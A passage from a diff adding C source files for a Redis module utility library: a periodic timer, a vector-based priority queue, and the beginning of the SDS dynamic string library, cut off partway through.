+                                     void *privdata, struct timespec interval) {
+  RMUtilTimer *ret = malloc(sizeof(*ret));
+  *ret = (RMUtilTimer){
+      .privdata = privdata, .interval = interval, .cb = cb, .onTerm = onTerm,
+  };
+  pthread_cond_init(&ret->cond, NULL);
+  pthread_mutex_init(&ret->lock, NULL);
+
+  pthread_create(&ret->thread, NULL, rmutilTimer_Loop, ret);
+  return ret;
+}
+
+int RMUtilTimer_Terminate(struct RMUtilTimer *t) {
+  return pthread_cond_signal(&t->cond);
+}
@@ -0,0 +1,46 @@
+#ifndef RMUTIL_PERIODIC_H_
+#define RMUTIL_PERIODIC_H_
+#include <time.h>
+#include <redismodule.h>
+
+/** periodic.h - Utility periodic timer running a task repeatedly every given time interval */
+
+/* RMUtilTimer - opaque context for the timer */
+struct RMUtilTimer;
+
+/* RMutilTimerFunc - callback type for timer tasks. The ctx is a thread-safe redis module context
+ * that should be locked/unlocked by the callback when running stuff against redis. privdata is
+ * pre-existing private data */
+typedef void (*RMutilTimerFunc)(RedisModuleCtx *ctx, void *privdata);
+
+typedef void (*RMUtilTimerTerminationFunc)(void *privdata);
+
+/* Create and start a new periodic timer. Each timer has its own thread and can only be run and
+ * stopped once. The timer runs `cb` every `interval` with `privdata` passed to the callback. */
+struct RMUtilTimer *RMUtil_NewPeriodicTimer(RMutilTimerFunc cb, RMUtilTimerTerminationFunc onTerm,
+                                            void *privdata, struct timespec interval);
+
+/* set a new frequency for the timer. This will take effect AFTER the next trigger */
+void RMUtilTimer_SetInterval(struct RMUtilTimer *t, struct timespec newInterval);
+
+/* Stop the timer loop, call the termination callbck to free up any resources linked to the timer,
+ * and free the timer after stopping.
+ *
+ * This function doesn't wait for the thread to terminate, as it may cause a race condition if the
+ * timer's callback is waiting for the redis global lock.
+ * Instead you should make sure any resources are freed by the callback after the thread loop is
+ * finished.
+ *
+ * The timer is freed automatically, so the callback doesn't need to do anything about it.
+ * The callback gets the timer's associated privdata as its argument.
+ *
+ * If no callback is specified we do not free up privdata. If privdata is NULL we still call the
+ * callback, as it may log stuff or free global resources.
+ */
+int RMUtilTimer_Terminate(struct RMUtilTimer *t);
+
+/* DEPRECATED - do not use this function (well now you can't), use terminate instead
+    Free the timer context. The caller should be responsible for freeing the private data at this
+ * point */
+// void RMUtilTimer_Free(struct RMUtilTimer *t);
+#endif
@@ -0,0 +1,36 @@
+#include "priority_queue.h"
+#include "heap.h"
+
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *)) {
+    PriorityQueue *pq = malloc(sizeof(PriorityQueue));
+    pq->v = __newVectorSize(elemSize, cap);
+    pq->cmp = cmp;
+    return pq;
+}
+
+inline size_t Priority_Queue_Size(PriorityQueue *pq) {
+    return Vector_Size(pq->v);
+}
+
+inline int Priority_Queue_Top(PriorityQueue *pq, void *ptr) {
+    return Vector_Get(pq->v, 0, ptr);
+}
+
+inline size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem) {
+    size_t top = __vector_PushPtr(pq->v, elem);
+    Heap_Push(pq->v, 0, top, pq->cmp);
+    return top;
+}
+
+inline void Priority_Queue_Pop(PriorityQueue *pq) {
+    if (pq->v->top == 0) {
+        return;
+    }
+    Heap_Pop(pq->v, 0, pq->v->top, pq->cmp);
+    pq->v->top--;
+}
+
+void Priority_Queue_Free(PriorityQueue *pq) {
+    Vector_Free(pq->v);
+    free(pq);
+}
@@ -0,0 +1,55 @@
+#ifndef __PRIORITY_QUEUE_H__
+#define __PRIORITY_QUEUE_H__
+
+#include "vector.h"
+
+/* Priority queue
+ * Priority queues are designed such that its first element is always the greatest of the elements it contains.
+ * This context is similar to a heap, where elements can be inserted at any moment, and only the max heap element can be
+ * retrieved (the one at the top in the priority queue).
+ * Priority queues are implemented as Vectors. Elements are popped from the "back" of Vector, which is known as the top
+ * of the priority queue.
+ */
+typedef struct {
+    Vector *v;
+
+    int (*cmp)(void *, void *);
+} PriorityQueue;
+
+/* Construct priority queue
+ * Constructs a priority_queue container adaptor object.
+ */
+PriorityQueue *__newPriorityQueueSize(size_t elemSize, size_t cap, int (*cmp)(void *, void *));
+
+#define NewPriorityQueue(type, cap, cmp) __newPriorityQueueSize(sizeof(type), cap, cmp)
+
+/* Return size
+ * Returns the number of elements in the priority_queue.
+ */
+size_t Priority_Queue_Size(PriorityQueue *pq);
+
+/* Access top element
+ * Copy the top element in the priority_queue to ptr.
+ * The top element is the element that compares higher in the priority_queue.
+ */
+int Priority_Queue_Top(PriorityQueue *pq, void *ptr);
+
+/* Insert element
+ * Inserts a new element in the priority_queue.
+ */
+size_t __priority_Queue_PushPtr(PriorityQueue *pq, void *elem);
+
+#define Priority_Queue_Push(pq, elem) __priority_Queue_PushPtr(pq, &(typeof(elem)){elem})
+
+/* Remove top element
+ * Removes the element on top of the priority_queue, effectively reducing its size by one. The element removed is the
+ * one with the highest value.
+ * The value of this element can be retrieved before being popped by calling Priority_Queue_Top.
+ */
+void Priority_Queue_Pop(PriorityQueue *pq);
+
+/* free the priority queue and the underlying data. Does not release its elements if
+ * they are pointers */
+void Priority_Queue_Free(PriorityQueue *pq);
+
+#endif //__PRIORITY_QUEUE_H__
@@ -0,0 +1,1274 @@
+/* SDSLib 2.0 -- A C dynamic strings library
+ *
+ * Copyright (c) 2006-2015, Salvatore Sanfilippo <antirez at gmail dot com>
+ * Copyright (c) 2015, Oran Agra
+ * Copyright (c) 2015, Redis Labs, Inc
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ *   * Redistributions of source code must retain the above copyright notice,
+ *     this list of conditions and the following disclaimer.
+ *   * Redistributions in binary form must reproduce the above copyright
+ *     notice, this list of conditions and the following disclaimer in the
+ *     documentation and/or other materials provided with the distribution.
+ *   * Neither the name of Redis nor the names of its contributors may be used
+ *     to endorse or promote products derived from this software without
+ *     specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <assert.h>
+#include "sds.h"
+#include "sdsalloc.h"
+
+static inline int sdsHdrSize(char type) {
+    switch(type&SDS_TYPE_MASK) {
+        case SDS_TYPE_5:
+            return sizeof(struct sdshdr5);
+        case SDS_TYPE_8:
+            return sizeof(struct sdshdr8);
+        case SDS_TYPE_16:
+            return sizeof(struct sdshdr16);
+        case SDS_TYPE_32:
+            return sizeof(struct sdshdr32);
+        case SDS_TYPE_64:
+            return sizeof(struct sdshdr64);
+    }
+    return 0;
+}
+
+static inline char sdsReqType(size_t string_size) {
+    if (string_size < 32)
+        return SDS_TYPE_5;
+    if (string_size < 0xff)
+        return SDS_TYPE_8;
+    if (string_size < 0xffff)
+        return SDS_TYPE_16;
+    if (string_size < 0xffffffff)
+        return SDS_TYPE_32;
+    return SDS_TYPE_64;
+}
+
+/* Create a new sds string with the content specified by the 'init' pointer
+ * and 'initlen'.
+ * If NULL is used for 'init' the string is initialized with zero bytes.
+ *
+ * The string is always null-termined (all the sds strings are, always) so
+ * even if you create an sds string with:
+ *
+ * mystring = sdsnewlen("abc",3);
+ *
+ * You can print the string with printf() as there is an implicit \0 at the
+ * end of the string. However the string is binary safe and can contain
+ * \0 characters in the middle, as the length is stored in the sds header. */
+sds sdsnewlen(const void *init, size_t initlen) {
+    void *sh;
+    sds s;
+    char type = sdsReqType(initlen);
+    /* Empty strings are usually created in order to append. Use type 8
+     * since type 5 is not good at this. */
+    if (type == SDS_TYPE_5 && initlen == 0) type = SDS_TYPE_8;
+    int hdrlen = sdsHdrSize(type);
+    unsigned char *fp; /* flags pointer. */
+
+    sh = s_malloc(hdrlen+initlen+1);
+    if (!init)
+        memset(sh, 0, hdrlen+initlen+1);
+    if (sh == NULL) return NULL;
+    s = (char*)sh+hdrlen;
+    fp = ((unsigned char*)s)-1;
+    switch(type) {
+        case SDS_TYPE_5: {
+            *fp = type | (initlen << SDS_TYPE_BITS);
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            sh->len = initlen;
+            sh->alloc = initlen;
+            *fp = type;
+            break;
+        }
+    }
+    if (initlen && init)
+        memcpy(s, init, initlen);
+    s[initlen] = '\0';
+    return s;
+}
+
+/* Create an empty (zero length) sds string. Even in this case the string
+ * always has an implicit null term. */
+sds sdsempty(void) {
+    return sdsnewlen("",0);
+}
+
+/* Create a new sds string starting from a null terminated C string. */
+sds sdsnew(const char *init) {
+    size_t initlen = (init == NULL) ? 0 : strlen(init);
+    return sdsnewlen(init, initlen);
+}
+
+/* Duplicate an sds string. */
+sds sdsdup(const sds s) {
+    return sdsnewlen(s, sdslen(s));
+}
+
+/* Free an sds string. No operation is performed if 's' is NULL. */
+void sdsfree(sds s) {
+    if (s == NULL) return;
+    s_free((char*)s-sdsHdrSize(s[-1]));
+}
+
+/* Set the sds string length to the length as obtained with strlen(), so
+ * considering as content only up to the first null term character.
+ *
+ * This function is useful when the sds string is hacked manually in some
+ * way, like in the following example:
+ *
+ * s = sdsnew("foobar");
+ * s[2] = '\0';
+ * sdsupdatelen(s);
+ * printf("%d\n", sdslen(s));
+ *
+ * The output will be "2", but if we comment out the call to sdsupdatelen()
+ * the output will be "6" as the string was modified but the logical length
+ * remains 6 bytes. */
+void sdsupdatelen(sds s) {
+    int reallen = strlen(s);
+    sdssetlen(s, reallen);
+}
+
+/* Modify an sds string in-place to make it empty (zero length).
+ * However all the existing buffer is not discarded but set as free space
+ * so that next append operations will not require allocations up to the
+ * number of bytes previously available. */
+void sdsclear(sds s) {
+    sdssetlen(s, 0);
+    s[0] = '\0';
+}
+
+/* Enlarge the free space at the end of the sds string so that the caller
+ * is sure that after calling this function can overwrite up to addlen
+ * bytes after the end of the string, plus one more byte for nul term.
+ *
+ * Note: this does not change the *length* of the sds string as returned
+ * by sdslen(), but only the free buffer space we have. */
+sds sdsMakeRoomFor(sds s, size_t addlen) {
+    void *sh, *newsh;
+    size_t avail = sdsavail(s);
+    size_t len, newlen;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+
+    /* Return ASAP if there is enough space left. */
+    if (avail >= addlen) return s;
+
+    len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+    newlen = (len+addlen);
+    if (newlen < SDS_MAX_PREALLOC)
+        newlen *= 2;
+    else
+        newlen += SDS_MAX_PREALLOC;
+
+    type = sdsReqType(newlen);
+
+    /* Don't use type 5: the user is appending to the string and type 5 is
+     * not able to remember empty space, so sdsMakeRoomFor() must be called
+     * at every appending operation. */
+    if (type == SDS_TYPE_5) type = SDS_TYPE_8;
+
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        /* Since the header size changes, need to move the string forward,
+         * and can't use realloc */
+        newsh = s_malloc(hdrlen+newlen+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, newlen);
+    return s;
+}
+
+/* Reallocate the sds string so that it has no free space at the end. The
+ * contained string remains not altered, but next concatenation operations
+ * will require a reallocation.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdsRemoveFreeSpace(sds s) {
+    void *sh, *newsh;
+    char type, oldtype = s[-1] & SDS_TYPE_MASK;
+    int hdrlen;
+    size_t len = sdslen(s);
+    sh = (char*)s-sdsHdrSize(oldtype);
+
+    type = sdsReqType(len);
+    hdrlen = sdsHdrSize(type);
+    if (oldtype==type) {
+        newsh = s_realloc(sh, hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        s = (char*)newsh+hdrlen;
+    } else {
+        newsh = s_malloc(hdrlen+len+1);
+        if (newsh == NULL) return NULL;
+        memcpy((char*)newsh+hdrlen, s, len+1);
+        s_free(sh);
+        s = (char*)newsh+hdrlen;
+        s[-1] = type;
+        sdssetlen(s, len);
+    }
+    sdssetalloc(s, len);
+    return s;
+}
+
+/* Return the total size of the allocation of the specifed sds string,
+ * including:
+ * 1) The sds header before the pointer.
+ * 2) The string.
+ * 3) The free buffer at the end if any.
+ * 4) The implicit null term.
+ */
+size_t sdsAllocSize(sds s) {
+    size_t alloc = sdsalloc(s);
+    return sdsHdrSize(s[-1])+alloc+1;
+}
+
+/* Return the pointer of the actual SDS allocation (normally SDS strings
+ * are referenced by the start of the string buffer). */
+void *sdsAllocPtr(sds s) {
+    return (void*) (s-sdsHdrSize(s[-1]));
+}
+
+/* Increment the sds length and decrements the left free space at the
+ * end of the string according to 'incr'. Also set the null term
+ * in the new end of the string.
+ *
+ * This function is used in order to fix the string length after the
+ * user calls sdsMakeRoomFor(), writes something after the end of
+ * the current string, and finally needs to set the new length.
+ *
+ * Note: it is possible to use a negative increment in order to
+ * right-trim the string.
+ *
+ * Usage example:
+ *
+ * Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the
+ * following schema, to cat bytes coming from the kernel to the end of an
+ * sds string without copying into an intermediate buffer:
+ *
+ * oldlen = sdslen(s);
+ * s = sdsMakeRoomFor(s, BUFFER_SIZE);
+ * nread = read(fd, s+oldlen, BUFFER_SIZE);
+ * ... check for nread <= 0 and handle it ...
+ * sdsIncrLen(s, nread);
+ */
+void sdsIncrLen(sds s, int incr) {
+    unsigned char flags = s[-1];
+    size_t len;
+    switch(flags&SDS_TYPE_MASK) {
+        case SDS_TYPE_5: {
+            unsigned char *fp = ((unsigned char*)s)-1;
+            unsigned char oldlen = SDS_TYPE_5_LEN(flags);
+            assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr)));
+            *fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS);
+            len = oldlen+incr;
+            break;
+        }
+        case SDS_TYPE_8: {
+            SDS_HDR_VAR(8,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_16: {
+            SDS_HDR_VAR(16,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_32: {
+            SDS_HDR_VAR(32,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        case SDS_TYPE_64: {
+            SDS_HDR_VAR(64,s);
+            assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr)));
+            len = (sh->len += incr);
+            break;
+        }
+        default: len = 0; /* Just to avoid compilation warnings. */
+    }
+    s[len] = '\0';
+}
+
+/* Grow the sds to have the specified length. Bytes that were not part of
+ * the original length of the sds will be set to zero.
+ *
+ * if the specified length is smaller than the current length, no operation
+ * is performed. */
+sds sdsgrowzero(sds s, size_t len) {
+    size_t curlen = sdslen(s);
+
+    if (len <= curlen) return s;
+    s = sdsMakeRoomFor(s,len-curlen);
+    if (s == NULL) return NULL;
+
+    /* Make sure added region doesn't contain garbage */
+    memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the
+ * end of the specified sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatlen(sds s, const void *t, size_t len) {
+    size_t curlen = sdslen(s);
+
+    s = sdsMakeRoomFor(s,len);
+    if (s == NULL) return NULL;
+    memcpy(s+curlen, t, len);
+    sdssetlen(s, curlen+len);
+    s[curlen+len] = '\0';
+    return s;
+}
+
+/* Append the specified null termianted C string to the sds string 's'.
+ *
+ * After the call, the passed sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscat(sds s, const char *t) {
+    return sdscatlen(s, t, strlen(t));
+}
+
+/* Append the specified sds 't' to the existing sds 's'.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatsds(sds s, const sds t) {
+    return sdscatlen(s, t, sdslen(t));
+}
+
+/* Destructively modify the sds string 's' to hold the specified binary
+ * safe string pointed by 't' of length 'len' bytes. */
+sds sdscpylen(sds s, const char *t, size_t len) {
+    if (sdsalloc(s) < len) {
+        s = sdsMakeRoomFor(s,len-sdslen(s));
+        if (s == NULL) return NULL;
+    }
+    memcpy(s, t, len);
+    s[len] = '\0';
+    sdssetlen(s, len);
+    return s;
+}
+
+/* Like sdscpylen() but 't' must be a null-termined string so that the length
+ * of the string is obtained with strlen(). */
+sds sdscpy(sds s, const char *t) {
+    return sdscpylen(s, t, strlen(t));
+}
+
+/* Helper for sdscatlonglong() doing the actual number -> string
+ * conversion. 's' must point to a string with room for at least
+ * SDS_LLSTR_SIZE bytes.
+ *
+ * The function returns the length of the null-terminated string
+ * representation stored at 's'. */
+#define SDS_LLSTR_SIZE 21
+int sdsll2str(char *s, long long value) {
+    char *p, aux;
+    unsigned long long v;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    v = (value < 0) ? -value : value;
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+    if (value < 0) *p++ = '-';
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Identical sdsll2str(), but for unsigned long long type. */
+int sdsull2str(char *s, unsigned long long v) {
+    char *p, aux;
+    size_t l;
+
+    /* Generate the string representation, this method produces
+     * an reversed string. */
+    p = s;
+    do {
+        *p++ = '0'+(v%10);
+        v /= 10;
+    } while(v);
+
+    /* Compute length and add null term. */
+    l = p-s;
+    *p = '\0';
+
+    /* Reverse the string. */
+    p--;
+    while(s < p) {
+        aux = *s;
+        *s = *p;
+        *p = aux;
+        s++;
+        p--;
+    }
+    return l;
+}
+
+/* Create an sds string from a long long value. It is much faster than:
+ *
+ * sdscatprintf(sdsempty(),"%lld\n", value);
+ */
+sds sdsfromlonglong(long long value) {
+    char buf[SDS_LLSTR_SIZE];
+    int len = sdsll2str(buf,value);
+
+    return sdsnewlen(buf,len);
+}
+
+/* Like sdscatprintf() but gets va_list instead of being variadic. */
+sds sdscatvprintf(sds s, const char *fmt, va_list ap) {
+    va_list cpy;
+    char staticbuf[1024], *buf = staticbuf, *t;
+    size_t buflen = strlen(fmt)*2;
+
+    /* We try to start using a static buffer for speed.
+     * If not possible we revert to heap allocation. */
+    if (buflen > sizeof(staticbuf)) {
+        buf = s_malloc(buflen);
+        if (buf == NULL) return NULL;
+    } else {
+        buflen = sizeof(staticbuf);
+    }
+
+    /* Try with buffers two times bigger every time we fail to
+     * fit the string in the current buffer size. */
+    while(1) {
+        buf[buflen-2] = '\0';
+        va_copy(cpy,ap);
+        vsnprintf(buf, buflen, fmt, cpy);
+        va_end(cpy);
+        if (buf[buflen-2] != '\0') {
+            if (buf != staticbuf) s_free(buf);
+            buflen *= 2;
+            buf = s_malloc(buflen);
+            if (buf == NULL) return NULL;
+            continue;
+        }
+        break;
+    }
+
+    /* Finally concat the obtained string to the SDS string and return it. */
+    t = sdscat(s, buf);
+    if (buf != staticbuf) s_free(buf);
+    return t;
+}
+
+/* Append to the sds string 's' a string obtained using printf-alike format
+ * specifier.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("Sum is: ");
+ * s = sdscatprintf(s,"%d+%d = %d",a,b,a+b).
+ *
+ * Often you need to create a string from scratch with the printf-alike
+ * format. When this is the need, just use sdsempty() as the target string:
+ *
+ * s = sdscatprintf(sdsempty(), "... your format ...", args);
+ */
+sds sdscatprintf(sds s, const char *fmt, ...) {
+    va_list ap;
+    char *t;
+    va_start(ap, fmt);
+    t = sdscatvprintf(s,fmt,ap);
+    va_end(ap);
+    return t;
+}
+
+/* This function is similar to sdscatprintf, but much faster as it does
+ * not rely on sprintf() family functions implemented by the libc that
+ * are often very slow. Moreover directly handling the sds string as
+ * new data is concatenated provides a performance improvement.
+ *
+ * However this function only handles an incompatible subset of printf-alike
+ * format specifiers:
+ *
+ * %s - C String
+ * %S - SDS string
+ * %i - signed int
+ * %I - 64 bit signed integer (long long, int64_t)
+ * %u - unsigned int
+ * %U - 64 bit unsigned integer (unsigned long long, uint64_t)
+ * %% - Verbatim "%" character.
+ */
+sds sdscatfmt(sds s, char const *fmt, ...) {
+    size_t initlen = sdslen(s);
+    const char *f = fmt;
+    int i;
+    va_list ap;
+
+    va_start(ap,fmt);
+    f = fmt;    /* Next format specifier byte to process. */
+    i = initlen; /* Position of the next byte to write to dest str. */
+    while(*f) {
+        char next, *str;
+        size_t l;
+        long long num;
+        unsigned long long unum;
+
+        /* Make sure there is always space for at least 1 char. */
+        if (sdsavail(s)==0) {
+            s = sdsMakeRoomFor(s,1);
+        }
+
+        switch(*f) {
+        case '%':
+            next = *(f+1);
+            f++;
+            switch(next) {
+            case 's':
+            case 'S':
+                str = va_arg(ap,char*);
+                l = (next == 's') ? strlen(str) : sdslen(str);
+                if (sdsavail(s) < l) {
+                    s = sdsMakeRoomFor(s,l);
+                }
+                memcpy(s+i,str,l);
+                sdsinclen(s,l);
+                i += l;
+                break;
+            case 'i':
+            case 'I':
+                if (next == 'i')
+                    num = va_arg(ap,int);
+                else
+                    num = va_arg(ap,long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsll2str(buf,num);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            case 'u':
+            case 'U':
+                if (next == 'u')
+                    unum = va_arg(ap,unsigned int);
+                else
+                    unum = va_arg(ap,unsigned long long);
+                {
+                    char buf[SDS_LLSTR_SIZE];
+                    l = sdsull2str(buf,unum);
+                    if (sdsavail(s) < l) {
+                        s = sdsMakeRoomFor(s,l);
+                    }
+                    memcpy(s+i,buf,l);
+                    sdsinclen(s,l);
+                    i += l;
+                }
+                break;
+            default: /* Handle %% and generally %<unknown>. */
+                s[i++] = next;
+                sdsinclen(s,1);
+                break;
+            }
+            break;
+        default:
+            s[i++] = *f;
+            sdsinclen(s,1);
+            break;
+        }
+        f++;
+    }
+    va_end(ap);
+
+    /* Add null-term */
+    s[i] = '\0';
+    return s;
+}
+
+/* Remove the part of the string from left and from right composed just of
+ * contiguous characters found in 'cset', that is a null terminted C string.
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call.
+ *
+ * Example:
+ *
+ * s = sdsnew("AA...AA.a.aa.aHelloWorld     :::");
+ * s = sdstrim(s,"Aa. :");
+ * printf("%s\n", s);
+ *
+ * Output will be just "Hello World".
+ */
+sds sdstrim(sds s, const char *cset) {
+    char *start, *end, *sp, *ep;
+    size_t len;
+
+    sp = start = s;
+    ep = end = s+sdslen(s)-1;
+    while(sp <= end && strchr(cset, *sp)) sp++;
+    while(ep > sp && strchr(cset, *ep)) ep--;
+    len = (sp > ep) ? 0 : ((ep-sp)+1);
+    if (s != sp) memmove(s, sp, len);
+    s[len] = '\0';
+    sdssetlen(s,len);
+    return s;
+}
+
+/* Turn the string into a smaller (or equal) string containing only the
+ * substring specified by the 'start' and 'end' indexes.
+ *
+ * start and end can be negative, where -1 means the last character of the
+ * string, -2 the penultimate character, and so forth.
+ *
+ * The interval is inclusive, so the start and end characters will be part
+ * of the resulting string.
+ *
+ * The string is modified in-place.
+ *
+ * Example:
+ *
+ * s = sdsnew("Hello World");
+ * sdsrange(s,1,-1); => "ello World"
+ */
+void sdsrange(sds s, int start, int end) {
+    size_t newlen, len = sdslen(s);
+
+    if (len == 0) return;
+    if (start < 0) {
+        start = len+start;
+        if (start < 0) start = 0;
+    }
+    if (end < 0) {
+        end = len+end;
+        if (end < 0) end = 0;
+    }
+    newlen = (start > end) ? 0 : (end-start)+1;
+    if (newlen != 0) {
+        if (start >= (signed)len) {
+            newlen = 0;
+        } else if (end >= (signed)len) {
+            end = len-1;
+            newlen = (start > end) ? 0 : (end-start)+1;
+        }
+    } else {
+        start = 0;
+    }
+    if (start && newlen) memmove(s, s+start, newlen);
+    s[newlen] = 0;
+    sdssetlen(s,newlen);
+}
+
+/* Apply tolower() to every character of the sds string 's'. */
+void sdstolower(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = tolower(s[j]);
+}
+
+/* Apply toupper() to every character of the sds string 's'. */
+void sdstoupper(sds s) {
+    int len = sdslen(s), j;
+
+    for (j = 0; j < len; j++) s[j] = toupper(s[j]);
+}
+
+/* Compare two sds strings s1 and s2 with memcmp().
+ *
+ * Return value:
+ *
+ *     positive if s1 > s2.
+ *     negative if s1 < s2.
+ *     0 if s1 and s2 are exactly the same binary string.
+ *
+ * If two strings share exactly the same prefix, but one of the two has
+ * additional characters, the longer string is considered to be greater than
+ * the smaller one. */
+int sdscmp(const sds s1, const sds s2) {
+    size_t l1, l2, minlen;
+    int cmp;
+
+    l1 = sdslen(s1);
+    l2 = sdslen(s2);
+    minlen = (l1 < l2) ? l1 : l2;
+    cmp = memcmp(s1,s2,minlen);
+    if (cmp == 0) return l1-l2;
+    return cmp;
+}
+
+/* Split 's' with separator in 'sep'. An array
+ * of sds strings is returned. *count will be set
+ * by reference to the number of tokens returned.
+ *
+ * On out of memory, zero length string, zero length
+ * separator, NULL is returned.
+ *
+ * Note that 'sep' is able to split a string using
+ * a multi-character separator. For example
+ * sdssplit("foo_-_bar","_-_"); will return two
+ * elements "foo" and "bar".
+ *
+ * This version of the function is binary-safe but
+ * requires length arguments. sdssplit() is just the
+ * same function but for zero-terminated strings.
+ */
+sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count) {
+    int elements = 0, slots = 5, start = 0, j;
+    sds *tokens;
+
+    if (seplen < 1 || len < 0) return NULL;
+
+    tokens = s_malloc(sizeof(sds)*slots);
+    if (tokens == NULL) return NULL;
+
+    if (len == 0) {
+        *count = 0;
+        return tokens;
+    }
+    for (j = 0; j < (len-(seplen-1)); j++) {
+        /* make sure there is room for the next element and the final one */
+        if (slots < elements+2) {
+            sds *newtokens;
+
+            slots *= 2;
+            newtokens = s_realloc(tokens,sizeof(sds)*slots);
+            if (newtokens == NULL) goto cleanup;
+            tokens = newtokens;
+        }
+        /* search the separator */
+        if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) {
+            tokens[elements] = sdsnewlen(s+start,j-start);
+            if (tokens[elements] == NULL) goto cleanup;
+            elements++;
+            start = j+seplen;
+            j = j+seplen-1; /* skip the separator */
+        }
+    }
+    /* Add the final element. We are sure there is room in the tokens array. */
+    tokens[elements] = sdsnewlen(s+start,len-start);
+    if (tokens[elements] == NULL) goto cleanup;
+    elements++;
+    *count = elements;
+    return tokens;
+
+cleanup:
+    {
+        int i;
+        for (i = 0; i < elements; i++) sdsfree(tokens[i]);
+        s_free(tokens);
+        *count = 0;
+        return NULL;
+    }
+}
+
+/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */
+void sdsfreesplitres(sds *tokens, int count) {
+    if (!tokens) return;
+    while(count--)
+        sdsfree(tokens[count]);
+    s_free(tokens);
+}
+
+/* Append to the sds string "s" an escaped string representation where
+ * all the non-printable characters (tested with isprint()) are turned into
+ * escapes in the form "\n\r\a...." or "\x<hex-number>".
+ *
+ * After the call, the modified sds string is no longer valid and all the
+ * references must be substituted with the new pointer returned by the call. */
+sds sdscatrepr(sds s, const char *p, size_t len) {
